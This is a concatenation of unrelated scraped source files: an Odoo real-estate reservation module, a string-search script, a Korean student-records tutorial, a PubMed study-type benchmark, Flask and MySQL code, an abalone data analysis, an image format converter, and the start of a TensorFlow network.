'rs.reservation',\r\n 'type': 'ir.actions.act_window',\r\n 'target': 'current',\r\n 'res_id': rec.id,\r\n }\r\n\r\n @api.multi\r\n def cancel(self):\r\n for rec in self:\r\n if not rec.approve_cancellation:\r\n raise ValidationError(_('Manager Must Approve Cancellation'))\r\n if not rec.payment_attach_ids:\r\n raise ValidationError(_(\"You should attach Cancellation papers.\"))\r\n if rec.payment_attach_ids:\r\n if not any(attach.attach_type == 'cancel' for attach in rec.payment_attach_ids):\r\n raise ValidationError(_(\"You should attach a File of type cancel.\"))\r\n for attach in rec.payment_attach_ids:\r\n if attach.attach_type == 'cancel' and attach.file_size == 0:\r\n raise ValidationError(_(\"You should attach 'Cancel' file that has size.\"))\r\n\r\n if not rec.customer_id:\r\n raise ValidationError(_('You Must Choose Customer'))\r\n\r\n for unit in rec.unit_ids:\r\n unit.write({'status': 'available'})\r\n rec.write({'state': 'cancel', 'cancelled': True, 'cancel_user_id': rec.env.user.id})\r\n for inv in rec.account_invoice_ids:\r\n if inv.state not in ('draft', 'cancel'):\r\n raise ValidationError(\r\n _('Cannot cancel this sales order!'),\r\n _('First cancel all invoices attached to this sales order.'))\r\n inv.signal_workflow('invoice_cancel')\r\n\r\n rec.sale_order_id.write({'state': 'cancel'})\r\n\r\n @api.constrains('created_date', 'expire_date')\r\n def _check_created_date(self):\r\n for obj in self:\r\n if obj.expire_date and obj.created_date and obj.expire_date <= obj.created_date:\r\n raise ValidationError(_('Expire Date Must be greater Than Creation Date'))\r\n\r\n @api.multi\r\n @api.onchange('project_id')\r\n def on_change_project(self):\r\n for rec in self:\r\n # rec.unit_ids = False\r\n all_phases = []\r\n if rec.phase_id.project_id.id != rec.project_id.id:\r\n rec.phase_id = False\r\n phases = self.env['project.phase'].search(\r\n [('project_id', '=', rec.project_id.id), ('available', '=', True)])\r\n for phase in phases:\r\n all_phases.append(phase.id)\r\n return {'domain': {'phase_id': [('id', 'in', all_phases)]}}\r\n\r\n @api.multi\r\n @api.onchange('phase_id')\r\n def on_change_phase(self):\r\n for rec in self:\r\n\r\n all_properties = []\r\n properties = self.env['product.product'].search([('project_id', '=', rec.project_id.id),\r\n ('phase_id', '=', rec.phase_id.id),\r\n ('type', '=', 'property'),\r\n ('status', 'in', ['available'])])\r\n\r\n not_avail_prop = self.env['product.product'].search([('project_id', '=', rec.project_id.id),\r\n ('phase_id', '=', rec.phase_id.id),\r\n ('type', '=', 'property'),\r\n ('resp_user_id', '=', self.env.uid),\r\n ('status', 'in', ['not_available'])]).ids\r\n\r\n for property in properties:\r\n all_properties.append(property.id)\r\n\r\n if not_avail_prop:\r\n all_properties += not_avail_prop\r\n rec.unit_ids = rec.unit_ids if rec.unit_ids and len(rec.unit_ids) == 1 and rec.unit_ids.ids[\r\n 0] in all_properties else False\r\n return {'domain': {'unit_ids': [('id', 'in', all_properties)]}}\r\n\r\n @api.multi\r\n def action_paid_broker_amount(self):\r\n for rec in self:\r\n if not rec.broker_ids:\r\n raise ValidationError(_('There is no Brokers'))\r\n if rec.state == 'draft':\r\n raise ValidationError(_('You Can not create invoice , Reservation state is draft'))\r\n if rec.state == 'cancel':\r\n raise ValidationError(_('You Can not create invoice , Reservation state is cancelled'))\r\n if rec.state not in ['draft', 'cancel']:\r\n account_invoice_obj = rec.env['account.invoice']\r\n for broker in rec.broker_ids:\r\n if not broker.broker_commission_amount:\r\n raise ValidationError(\r\n _('You Must Enter Commission percentage for this broker \"%s\" ') % (broker.name))\r\n if not broker.broker_commission_account:\r\n raise ValidationError(\r\n _('You Must Enter Commission account for this broker \"%s\" ') % (broker.name))\r\n\r\n if broker.broker_commission_account:\r\n account_invoice_obj.create({'partner_id': broker.id,\r\n 'company_id': self.env.user.company_id.id,\r\n 'property_account_payable_id': broker.broker_commission_account.id or False,\r\n 'reserve_id': rec.id,\r\n 'type': 'in_invoice',\r\n 'invoice_line_ids': [(0, 0, {\r\n 'name': 'Broker Commission',\r\n 'account_id': broker.broker_commission_account.id,\r\n 'price_unit': (rec.net_price * broker.broker_commission_amount)\r\n / 100.0,\r\n })]\r\n })\r\n else:\r\n raise ValidationError(_(\"You Must Enter Commission Account.\"))\r\n rec.write({'button_broker_paid': True})\r\n return True\r\n\r\n @api.multi\r\n def print_payment_report(self):\r\n data = {}\r\n data['form'] = \\\r\n self.read(['name', 'reservation_code', 'project_id', 'phase_id', 'unit_ids', 'pay_strategy_id'])[0]\r\n data['ids'] = self.id\r\n return self.env['report'].get_action(self, 'sky_height.reservation_payment_report_template', data=data)\r\n\r\n @api.constrains('payment_strg_ids')\r\n def _check_payment_strg_ids(self):\r\n self._check_total_payment_amount()\r\n\r\n @api.multi\r\n @api.depends('net_price', 'payment_strg_ids', 'pay_strategy_id')\r\n def _check_total_payment_amount(self):\r\n for rec in self:\r\n total_amount = 0.0\r\n maintaince_amount = 0.0\r\n for payment_obj in rec.payment_strg_ids:\r\n if float_compare(payment_obj.maintainance_fees, 0.0, 6) in [1]:\r\n if float_compare(payment_obj.maintainance_fees, payment_obj.amount, 6) in [1]:\r\n raise ValidationError(_(\"Maintenance fees can not be greater than cheque amount!!\"))\r\n if payment_obj.old_value == 0.0:\r\n payment_obj.old_value = payment_obj.amount\r\n payment_obj.amount += payment_obj.maintainance_fees\r\n total_amount += payment_obj.old_value\r\n\r\n elif payment_obj.add_extension:\r\n maintaince_amount += payment_obj.amount\r\n else:\r\n total_amount += round(payment_obj.amount, 6)\r\n if float_compare(round(total_amount), round(rec.net_price), 6) in [1, -1]:\r\n raise ValidationError(_('Total Amount of Payments Must Be Equal Net Price \"%s\". ') % rec.net_price)\r\n\r\n\r\nclass PDCStatus(models.Model):\r\n _name = 'pds.status'\r\n\r\n name = fields.Char(\"Name\", required=True)\r\n\r\n\r\nclass IrAttachment(models.Model):\r\n _inherit = 'ir.attachment'\r\n\r\n reserve_id = fields.Many2one('rs.reservation', string='Reservation')\r\n cancel_reserve_id = fields.Many2one('rs.reservation', string='Cancel Reservation')\r\n cancel_sale_reserve_id = fields.Many2one('sale.order', string='Cancel Reservation')\r\n legal_type = fields.Selection([('legal1', 'Legal Attachment 1'), ('legal2', 'Legal Attachment 2')], string='Type')\r\n\r\n attach_type = fields.Selection([('deposit', _(\"Deposit\")),\r\n ('checks', _(\"Checks\")),\r\n ('signature', _(\"Signature\")),\r\n ('cancel', _(\"Cancellation\")), ], _('Type'))\r\n","repo_name":"ahmedyousssssef/odoo","sub_path":"openerp/addons/sky_height/models/real_estate_reservation.py","file_name":"real_estate_reservation.py","file_ext":"py","file_size_in_byte":69245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"5657281210","text":"import sys\r\nimport string\r\n\r\nclass color:\r\n GREEN = '\\033[92m'\r\n RED = '\\033[91m'\r\n ENDC = '\\033[0m'\r\n\r\ndef printprocess(shift):\r\n print(text)\r\n for i in range(0, shift):\r\n print(\" \", end = \"\")\r\n print(pattern)\r\n\r\ndef preprocess(pattern):\r\n occ = dict.fromkeys(string.ascii_lowercase, -1)\r\n \r\n for i in range(0,len(pattern)-1):\r\n occ[pattern[i]] = i\r\n\r\n return occ\r\n\r\ndef search(text,pattern,occ):\r\n found = 0\r\n i = 0\r\n m = len(pattern)\r\n n = len(text)\r\n\r\n while i <= n - m:\r\n printprocess(i)\r\n \r\n j = m - 1\r\n\r\n while j >= 0 and pattern[j] == text[i + j]:\r\n j = j - 1\r\n\r\n if j < 0:\r\n found = found + 1\r\n print(f\"{color.GREEN}Found!{color.ENDC}\")\r\n\r\n i = i + m-1\r\n i = i - occ[text[i]]\r\n\r\n return found\r\n\r\ntext=\"\"\r\npattern=\"\"\r\n\r\nwhile len(text) <= 0:\r\n text = input(\"Text: \")\r\n\r\nwhile len(pattern) <= 0:\r\n pattern = input(\"Pattern: \")\r\n\r\nocc = preprocess(pattern)\r\n\r\nfound = search(text,pattern,occ)\r\n\r\nprint(f\"{color.RED}Found\", found, f\"match(es){color.ENDC}\")","repo_name":"FjolleI/boyer-moore-horspool","sub_path":"horspool.py","file_name":"horspool.py","file_ext":"py","file_size_in_byte":1110,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71019907682","text":"def studentDataProgram():\n profile = dict()\n\n while 1:\n selectNum = input(\"1.학생 저장하기\\n2. 학생 조회하기\\n0. 종료\\n\")\n # 원래 코드 보면 a라고 변수이름을 지정했던데 변수이름은 for문에 들어가는 i를 제외하고는\n # 항상 의미가 담긴 이름을 지어야 나중에 코드 볼때 안 헷갈림\n\n if selectNum == '1':\n name = input(\"학생의 이름을 적어주세요\\n\")\n age = input(\"학생의 나이를 적어주세요\\n\")\n kg = input(\"학생의 몸무게를 적어주세요\\n\")\n\n profile[name] = [age, kg]\n # 이름을 key로 사용해서 배열로 나이와 키를 저장함\n\n if selectNum == '2':\n findname = input('학생의 이름을 입력하세요\\n')\n\n if findname in profile: # 해당 key가 딕셔너리에 있는지를 확인하는 in 함수\n print(\"학생의 나이는 \" + profile[findname][0] + \"세 입니다.\")\n print(\"학생의 몸무게는 \" + profile[findname][1] + \"kg 입니다.\\n\")\n # 파이썬은 개꿀언어라 굳이 %s이런식으로 사용안하고 위 코드처럼 날로먹어도 됨\n\n if findname not in profile:\n print(\"존재하지 않는 학생입니다\")\n # 코딩테스트에서는 상관없긴하지만 else 문법은 아예 사용안하는걸 습관화 하는게 좋음\n # else를 사용하면 코드를 보고 직관적으로 어떤 경우에 해당 기능을 실행하는지 헷갈리기 떄문\n if selectNum != '1' and selectNum != '2':\n print(\"잘못된 메뉴선택입니다\")\n\n if selectNum == '0':\n # 함수 종료는 항상 return으로\n return\n\nstudentDataProgram()\n# 추가로 띄어쓰기나 줄바꿈 깔끔하게 코드 작성하는것도 습관화 해놔야 나중에 가독성이 좋아서 안헷갈림\n# 코드도 글쓴다고 생각하고 의미가 좀 변하거나, if 문 사이는 항상 한칸씩 띄워서 연습하면 좋음","repo_name":"leeminjae-dev/Coding_Test","sub_path":"df.py","file_name":"df.py","file_ext":"py","file_size_in_byte":2105,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"19404389023","text":"# Libraries\r\nimport pandas as pd\r\nfrom pymed import PubMed\r\nfrom Library.Recognizer import ROOT_DIR\r\n\r\n\r\ndef paper_search(pmid):\r\n pubmed = PubMed(tool='name_of_the_database', email='simonecensuales1998@gmail.com')\r\n results = pubmed.query(pmid, max_results=1)\r\n article_list = []\r\n article_info = []\r\n\r\n for article in results:\r\n # Print the type of object we've found (can be either PubMedBookArticle or PubMedArticle).\r\n # We need to convert it to dictionary with available function\r\n article_dict = article.toDict()\r\n article_list.append(article_dict)\r\n\r\n if len(article_list) != 0:\r\n # Generate list of dict records which will hold all article details that could be fetch from PUBMED API\r\n for article in article_list:\r\n # Sometimes article['pubmed_id'] contains list separated with comma - take first pubmedId in that list -\r\n # thats article pubmedId\r\n pubmed_id = article['pubmed_id'].partition('\\n')[0]\r\n # Append article info to dictionary\r\n try:\r\n article_info.append({u'pmid': pmid,\r\n u'pubmed_id': pubmed_id,\r\n u'title': article['title'],\r\n u'keywords': article['keywords'],\r\n u'journal': article['journal'],\r\n u'abstract': article['abstract'],\r\n u'conclusions': article['conclusions'],\r\n u'results': article['results']})\r\n except (Exception,):\r\n continue\r\n else:\r\n # Append article info to dictionary\r\n article_info.append({u'pmid': \"\",\r\n u'pubmed_id': \"\",\r\n u'title': \"\",\r\n u'keywords': \"\",\r\n u'journal': \"\",\r\n u'abstract': \"\",\r\n u'conclusions': \"\",\r\n u'results': \"\"})\r\n df = pd.DataFrame(article_info)\r\n return df\r\n\r\n\r\ndef build_database_onlyname(df):\r\n paper_documented = []\r\n for i in range(len(df)):\r\n paper_documented.append(\r\n [df.iloc[i][\"pmid\"]])\r\n return paper_documented\r\n\r\n\r\ndef search_all_paper():\r\n df = pd.read_csv(r\"\" + ROOT_DIR + '/Sources/benchmark_studytype.csv', sep=\";\")\r\n papers_pmid = build_database_onlyname(df)\r\n articles_pd = pd.DataFrame()\r\n for PMID in papers_pmid:\r\n article_df = paper_search(PMID)\r\n if article_df.iloc[0][\"pmid\"] != \"\":\r\n articles_pd = pd.concat([articles_pd, article_df])\r\n articles_pd.to_csv(r\"\" + ROOT_DIR + '/Sources/benchmark_studytypefinal.csv', index=False, header=True)\r\n\r\n\r\n# search_all_paper()\r\n\r\ndef meta_paper_creator(df):\r\n mega_string = \"\"\r\n str1 = str(df['title'])\r\n if str1 is None:\r\n str1 = \"\"\r\n str2 = str(df['abstract'])\r\n if str2 is None:\r\n str2 = \"\"\r\n str3 = \"\"\r\n for keyword in df['keywords']:\r\n if keyword is not None:\r\n str3 = str3 + str(keyword) + \" \"\r\n str4 = str(df['journal'])\r\n if str4 is None:\r\n str4 = \"\"\r\n str5 = str(df['conclusions'])\r\n if str5 is None:\r\n str5 = \"\"\r\n str6 = str(df['results'])\r\n if str6 is None:\r\n str6 = \"\"\r\n mega_string = mega_string + str1 + str2 + str3 + str4 + str5 + str6\r\n return mega_string\r\n\r\n\r\ndef search_keyword(mega_string):\r\n if len(mega_string) < 1:\r\n return 0\r\n points = []\r\n with open(ROOT_DIR + '/Sources/Studies/CaseControl.txt') as f:\r\n for line in f:\r\n stripped_line = line.strip()\r\n if stripped_line in mega_string:\r\n points.append(4)\r\n break\r\n with open(ROOT_DIR + '/Sources/Studies/CaseSeries.txt') as f:\r\n for line in f:\r\n stripped_line = line.strip()\r\n if stripped_line in mega_string:\r\n points.append(2)\r\n break\r\n with open(ROOT_DIR + '/Sources/Studies/CohortStudy.txt') as f:\r\n for line in f:\r\n stripped_line = line.strip()\r\n if stripped_line in mega_string:\r\n points.append(5)\r\n break\r\n with open(ROOT_DIR + '/Sources/Studies/MetaAnalysis.txt') as f:\r\n for line in f:\r\n stripped_line = line.strip()\r\n if stripped_line in mega_string:\r\n points.append(7)\r\n break\r\n with open(ROOT_DIR + '/Sources/Studies/ObservationalStudy.txt') as f:\r\n for line in f:\r\n stripped_line = line.strip()\r\n if stripped_line in mega_string:\r\n points.append(3)\r\n break\r\n with open(ROOT_DIR + '/Sources/Studies/Other.txt') as f:\r\n for line in f:\r\n stripped_line = line.strip()\r\n if stripped_line in mega_string:\r\n points.append(1)\r\n break\r\n with open(ROOT_DIR + '/Sources/Studies/RCT.txt') as f:\r\n for line in f:\r\n stripped_line = line.strip()\r\n if stripped_line in mega_string:\r\n points.append(6)\r\n break\r\n with open(ROOT_DIR + '/Sources/Studies/SystematicReview.txt') as f:\r\n for line in f:\r\n stripped_line = line.strip()\r\n if stripped_line in mega_string:\r\n points.append(7)\r\n break\r\n return points\r\n\r\n\r\ndef benchmark_studytype():\r\n df = pd.read_csv(r\"\" + ROOT_DIR + '/Sources/benchmark_studytypefinal.csv', sep=\",\")\r\n df2 = pd.read_csv(r\"\" + ROOT_DIR + '/Sources/benchmark_studytype.csv', sep=\";\")\r\n CC = 0 #correctly classified\r\n INCDIFF=0 #incremental score's differences\r\n for i in range(len(df)):\r\n mega_string = meta_paper_creator(df.iloc[i, :])\r\n points = search_keyword(mega_string)\r\n score = max(points, key=points.count)\r\n score2= df2.iloc[i][\"Score\"]\r\n INCDIFF += abs(score-score2)\r\n if score == df2.iloc[i][\"Score\"]:\r\n CC +=1\r\n accuracy = CC / len(df)\r\n MAE=((INCDIFF)/len(df))/7\r\n print(\"accuracy: \", round(accuracy * 100, 1), \"%\")\r\n print(\"MAE: \", round(MAE * 100, 1), \"%\")\r\n\r\n\r\nbenchmark_studytype()","repo_name":"Censu08/e-HealthProject","sub_path":"Library/Benchmark/Benchmark_StudyType.py","file_name":"Benchmark_StudyType.py","file_ext":"py","file_size_in_byte":6318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"4597926930","text":"from flask_app.config.mysqlconnection import connectToMySQL\nfrom flask_app import DATABASE_NAME\n#from flask_app.models.ninja import Ninja\nfrom flask import flash\nimport re\t# the regex module\n# create a regular expression object that we'll use later \nEMAIL_REGEX = re.compile(r'^[a-zA-Z0-9.+_-]+@[a-zA-Z0-9._-]+\\.[a-zA-Z]+$') \n\nclass Student:\n def __init__(self, data_dict):\n self.id = data_dict['id']\n self.name = data_dict['name']\n self.language = data_dict['language']\n self.location = data_dict['location']\n self.comments = data_dict['comments']\n self.created_at = data_dict['created_at']\n self.updated_at = data_dict['updated_at']\n\n @classmethod\n def create(cls,data_dict):\n query= \"\"\"INSERT INTO students (name,language,location,comments) VALUES \n (%(name)s,%(language)s,%(location)s,%(comments)s);\n \"\"\"\n return connectToMySQL(DATABASE_NAME).query_db(query,data_dict)\n \n @classmethod\n def get_student_by_id(cls,data_dict):\n # query = \"\"\"SELECT id,first_name, last_name,email, created_at, DATE_FORMAT(updated_at, '%M %e, %Y %h:%i %p') as updated_at \n # FROM users WHERE id=%(id)s;\"\"\"\n query = \"\"\"SELECT * FROM students WHERE id=%(id)s;\"\"\"\n result = connectToMySQL(DATABASE_NAME).query_db(query,data_dict)\n if result:\n the_user = cls(result[0])\n return the_user\n return False\n\n @staticmethod\n def validation(data_dict):\n is_valid=True\n if len(data_dict['name'])<2:\n is_valid = False\n flash(\"name is required\", \"name\")\n if not data_dict['location']:\n is_valid = False\n flash(\"location is required\", \"location\")\n if not data_dict['language']:\n is_valid = False\n flash(\"language is required\", \"language\")\n if len(data_dict['comments'])<1:\n is_valid = False\n flash(\"comment is required\", \"comments\")\n \n return is_valid\n \n \n # @classmethod\n # def get_all(cls):\n # query = \"\"\" SELECT * FROM users; \"\"\"\n \n # result = connectToMySQL(DATABASE_NAME).query_db(query)\n # all_users= []\n # for row in result:\n # user = cls(row)\n # all_users.append(user)\n # return all_users","repo_name":"MedAmineBenMakhlouf/Python","sub_path":"05-flask_mysql/Practice/Dojo_survey_Validation/flask_app/models/student.py","file_name":"student.py","file_ext":"py","file_size_in_byte":2367,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"12510822932","text":"class Solution(object):\n def possibleBipartition(self, N, dislikes):\n \"\"\"\n :type N: int\n :type dislikes: List[List[int]]\n :rtype: bool\n \"\"\"\n table = {}\n for a,b in dislikes:\n table.setdefault(a,[]).append(b)\n table.setdefault(b,[]).append(a)\n color = [-1]*(N+1)\n \n def dfs(i, c):\n if color[i]==-1:\n color[i] = c\n else:\n if color[i]!=c:\n return False\n else:\n return True\n for k in table.get(i,[]):\n if not dfs(k, 1-c):\n return False\n return True\n for i in xrange(1, N+1):\n if color[i]==-1 and not dfs(i, 0):\n return False\n return True\n ","repo_name":"nyroro/leetcode","sub_path":"LC922.py","file_name":"LC922.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"25679575226","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sb\nimport numpy as np\n\ndata = pd.read_csv(\"data.csv\", header=None)\nindex = [\"Length\", \"Diameter\", \"Height\", \"WholeWeight\", \"ShuckedWeight\", \"VisceraWeight\", \"ShellWeight\", \"Rings\"]\nindexp = [\"Sex\", \"Length\", \"Diameter\", \"Height\", \"WholeWeight\", \"ShuckedWeight\", \"VisceraWeight\", \"ShellWeight\",\n \"Rings\"]\n# 3.1\n\ncountOfEachGender = data[0].value_counts()\npercentageOfEachGender = data[0].value_counts(normalize=True) * 100\ntableData = {'count': countOfEachGender.values.tolist(), '%': percentageOfEachGender.values.tolist()}\ntable1 = pd.DataFrame(tableData, index=[\"Male\", \"Infant\", \"Female\"])\n# print(table1)\n\n# 3.2\n\ntable2 = data.describe().T.drop(['count'], axis=1)\ntable2.set_axis(index, axis=0, inplace=True)\n# print(table2)\n\n# 3.3\n\n# plt.bar([\"Male\", \"Infant\", \"Female\"], countOfEachGender, width=0.35)\n# plt.title(\"Liczebność poszczególnych płci\")\n# plt.show()\n\n# 3.4\n\n# fig, axes = plt.subplots(4, 2, figsize=(8, 7))\n# axes = axes.ravel()\n# for idx, ax in enumerate(axes):\n# ax.hist(data[:][idx + 1], 15, edgecolor=\"black\")\n# ax.set_title(index[idx])\n# plt.show()\n\n# 4.2\n\n# i = 1\n# j = 2\n# fig, axes = plt.subplots(14, 2, figsize=(7, 25))\n# axes = axes.ravel()\n# for idx, ax in enumerate(axes):\n# ax.scatter(data[:][i], data[:][j], s=5)\n# ax.set_xlabel(index[i-1])\n# ax.set_ylabel(index[j-1])\n# print(i, j)\n# if j == 8:\n# i += 1\n# j = i\n# if j < 8:\n# j += 1\n# else:\n# j = 1\n# plt.show()\n\n# 4.3\n\n# tableCorrelation = data.drop([0], axis=1).corr()\n# tableCorrelation.set_axis(index, axis=0, inplace=True)\n# tableCorrelation.set_axis(index, axis=1, inplace=True)\n# print(tableCorrelation.to_string())\n\n# 4.4\n\n# fig, ax = plt.subplots(figsize=(15, 5))\n# sb.heatmap(tableCorrelation, cmap=\"Blues\", linewidths=0.5)\n# ax.xaxis.tick_top()\n# plt.xticks(np.arange(8) + .5, labels=index)\n# plt.show()\n\n# 4.5\n\n# specificData = data[[1, 2]]\n# specificData.columns = [\"Length\", \"Diameter\"]\n# sb.regplot(x=\"Length\", y=\"Diameter\", data=specificData,\n# scatter_kws={'s': 10, 'alpha': 0.5})\n# plt.show()\n\n# 5.2\n\ndata.columns = indexp\ntable4 = data.groupby('Sex').describe().stack().T.stack(0)\ntable4 = table4.rename_axis([\"Feature\", \"Sex\"], axis=0)\n# print(table4)\n\n# 5.3\n\ntable5 = data.groupby('Sex')\nfemale = table5.get_group(\"F\")\ninfant = table5.get_group(\"I\")\nmale = table5.get_group(\"M\")\n\nfig, axes = plt.subplots(4, 2, figsize=(10, 20))\naxes = axes.ravel()\nfor idx, ax in enumerate(axes):\n ax.boxplot([female.iloc[:, idx+1], infant.iloc[:, idx+1], male.iloc[:, idx+1]])\n ax.set_xticklabels([\"Female\", \"Infant\", \"Male\"])\n ax.set_title(index[idx])\nplt.show()\n\n\n","repo_name":"geloStudy/SnailAnalysis","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2725,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"16092119458","text":"# For queries and response\nfrom db_setup import Session\nfrom app.models import Indicators\nfrom flask import render_template\nfrom flask import Flask, request, jsonify\n\n# Routing application\napplication = Flask(__name__, template_folder='../templates')\n\n@application.route('/', methods=['GET'])\ndef index():\n return render_template('index.html')\n\n\"\"\"\n Returns a list of all countries with no filter\n --------------------------------------\n Parameters:\n None so far\n\"\"\"\n@application.route('/countries/all', methods=['GET'])\ndef countries_all():\n session = Session()\n # Query on the database getting all the results\n countries = session.query(Indicators.location, Indicators.country).all()\n return jsonify(countries)\n\n\"\"\"\n Returns a list of countries filtering by:\n INDICATOR: SW_LIFS (Life satisfaction)\n INEQUALITY: TOT (Total)\n VALUE: greater than the input index\n --------------------------------------\n Parameters:\n index: min threshold for filtering\n\"\"\"\n@application.route('/countries/sw_lifs_gt/', methods=['GET'])\ndef countries_sw_lifs_gt(index):\n if index > 0.0:\n session = Session()\n # Query on the database according to the filters\n countries = session.query(Indicators.location, Indicators.country).filter(\n Indicators.indicator_code == 'SW_LIFS',\n Indicators.inequality_code == 'TOT',\n Indicators.value > index\n ).all()\n return jsonify(countries)\n else:\n message = {\n 'status': 400,\n 'message': 'Bad Request: The index is invalid! Please, select a value greater than 0',\n }\n resp = jsonify(message)\n resp.status_code = 400\n return resp\n\n\"\"\"\n Returns a custom message for 404 error\n --------------------------------------\n Parameters:\n None so far\n\"\"\"\n@application.errorhandler(404)\ndef not_found(error):\n message = {\n 'status': 404,\n 'message': 'Not Found: ' + request.url,\n }\n resp = jsonify(message)\n resp.status_code = 404\n return resp","repo_name":"mauriciolg90/aivo_test","sub_path":"app/controllers.py","file_name":"controllers.py","file_ext":"py","file_size_in_byte":2104,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"30525965372","text":"from PIL import Image\nimport os, glob\n\n# 说明: 对指定目录下,指定格式图片进行批量转换\n# 功能: 转 jpg, jpg2000, bmp\n# 过程: 进入指定目录, 选择图像, 选择转换格式, 设置压缩质量, 转换图片\n# 输出: 转换后的图像, 不覆盖原图, 保存在原图所在目录下的\n\nconvert2jpg = lambda img, q, outdir: img.save(outdir+os.path.splitext(img.filename)[0]+'_'+str(q)+'.jpg', quality=q)\nconvert2j2k = lambda img, q, outdir: img.save(outdir+os.path.splitext(img.filename)[0]+'_'\\\n +str(q)+'.j2k', quality_layers=[q], quality_mode=\"rates\")\nconvert2bmp = lambda img, outdir: img.save(outdir+os.path.splitext(img.filename)[0]+'.bmp')\n\n\ndef changeDir():\n while True:\n # 切换目录\n workdir = input('输入源图片文件所在目录: ')\n try:\n if len(workdir): os.chdir(workdir)\n print('工作目录为: %s'%os.getcwd())\n break\n except:\n print('目录有误...')\n\n\nbanner = '''********************\n图片格式转换-批量\n********************'''\nprint(banner)\nchangeDir()\n\nsrcFMT = input('输入原图片格式[bmp]: ')\nif len(srcFMT)==0: srcFMT='.bmp'\nif '.' not in srcFMT: srcFMT='.'+srcFMT\nsrcIMGs = glob.glob('*'+srcFMT)\n\ntoIMG=['.jpg', '.j2k', '.bmp']\ntip = '''----- 功能 -----\n[1] 转 jpg\n[2] 转 jpeg2000\n[3] 转 bmp\n[4] 退出程序\n输入数字(1-4)[1]: '''\nchoose = input(tip)\n# 默认转换格式\nif len(choose)==0: choose='1'\n# 输入检测\nif not choose.isdigit() or choose not in list('123'): exit()\n# 默认保存目录\ndesDIR = input('输入图片保存目录[%sDIR]: '%toIMG[int(choose)-1][1:])\nif len(desDIR)==0:\n desDIR='%sDIR'%toIMG[int(choose)-1][1:]+ os.path.sep\nelse:\n desDIR+=os.path.sep+'%sDIR'%toIMG[int(choose)-1][1:] + os.path.sep\n\ntry:\n os.listdir(desDIR)\nexcept:\n os.mkdir(desDIR)\n# 开始转换\nif choose == '1':\n qua = input('设置压缩质量(1-95)[80]: ')\n qua = 80 if len(qua)==0 else int(qua)\n for im in srcIMGs:\n convert2jpg(Image.open(im), qua, desDIR)\n print('convert %s to %s'%(im, os.path.splitext(im)[0]+toIMG[int(choose)-1]))\nelif choose=='2':\n rate = input('设置压缩倍数(2-100)[5]: ')\n rate = 5 if len(rate)==0 else int(rate)\n for im in srcIMGs:\n convert2j2k(Image.open(im), rate, desDIR)\n print('convert %s to %s'%(im, os.path.splitext(im)[0]+toIMG[int(choose)-1]))\nelif choose=='3':\n for im in srcIMGs:\n convert2bmp(Image.open(im), desDIR)\n print('convert %s to %s'%(im, os.path.splitext(im)[0]+toIMG[int(choose)-1]))\nprint('转换完毕...')\nos.system('pause')\n\n\n\n","repo_name":"supertab/gcode","sub_path":"tools/imageFMTConvert2.py","file_name":"imageFMTConvert2.py","file_ext":"py","file_size_in_byte":2654,"program_lang":"python","lang":"zh","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"45539113547","text":"\nimport tensorflow as tf\nimport lmbspecialops as sops\nimport numpy as np\ndef convrelu2(name,inputs, filters, kernel_size, stride, activation=None):\n\n tmp_y = tf.layers.conv2d(\n inputs=inputs,\n filters=filters,\n kernel_size=[kernel_size,1],\n strides=[stride,1],\n padding='same',\n name=name+'y',\n activation=activation\n )\n\n\n tmp_x = tf.layers.conv2d(\n inputs=tmp_y,\n filters=filters,\n kernel_size=[1,kernel_size],\n strides=[1,stride],\n padding='same',\n activation=activation,\n name=name+'x'\n )\n\n return tmp_x\n\ndef predict_final_image(inp):\n \"\"\"Generates a tensor for optical flow prediction\n \n inp: Tensor\n\n predict_confidence: bool\n If True the output tensor has 4 channels instead of 2.\n The last two channels are the x and y flow confidence.\n \"\"\"\n\n \n\n tmp = tf.layers.conv2d(\n inputs=inp,\n filters=24,\n kernel_size=3,\n strides=1,\n padding='same',\n name='conv1_pred',\n activation=myLeakyRelu\n )\n\n output = tf.layers.conv2d(\n inputs=tmp,\n filters=3,\n kernel_size=3,\n strides=1,\n padding='same',\n name='conv2_pred',\n activation=None\n )\n\n \n return output\ndef _refine(inp, num_outputs, upsampled_prediction=None, features_direct=None,name=None):\n \"\"\" Generates the concatenation of \n - the previous features used to compute the flow/depth\n - the upsampled previous flow/depth\n - the direct features that already have the correct resolution\n\n inp: Tensor\n The features that have been used before to compute flow/depth\n\n num_outputs: int \n number of outputs for the upconvolution of 'features'\n\n upsampled_prediction: Tensor\n The upsampled flow/depth prediction\n\n features_direct: Tensor\n The direct features which already have the spatial output resolution\n \"\"\"\n upsampled_features = tf.layers.conv2d_transpose(\n inputs=inp,\n filters=num_outputs,\n kernel_size=4,\n strides=2,\n padding='same',\n activation=myLeakyRelu,\n name=\"upconv\"\n )\n\n\n\n\n inputs = [upsampled_features, features_direct, upsampled_prediction]\n concat_inputs = [ x for x in inputs if not x is None ]\n\n return tf.concat(concat_inputs, axis=3)\n\ndef myLeakyRelu(x):\n \"\"\"Leaky ReLU with leak factor 0.1\"\"\"\n # return tf.maximum(0.1*x,x)\n return sops.leaky_relu(x, leak=0.2)\n\n\ndef create_network(input_image,gan_enabled=False):\n\n with tf.variable_scope('vae'):\n\n conv1 = convrelu2(name='conv1', inputs=input_image, filters=64, kernel_size=5, stride=2,activation=myLeakyRelu)\n\n if gan_enabled == True:\n conv1 = tf.layers.dropout(conv1)\n\n conv2 = convrelu2(name='conv2', inputs=conv1, filters=128, kernel_size=3, stride=2,activation=myLeakyRelu)\n\n if gan_enabled == True:\n conv2 = tf.layers.dropout(conv2)\n\n conv3 = 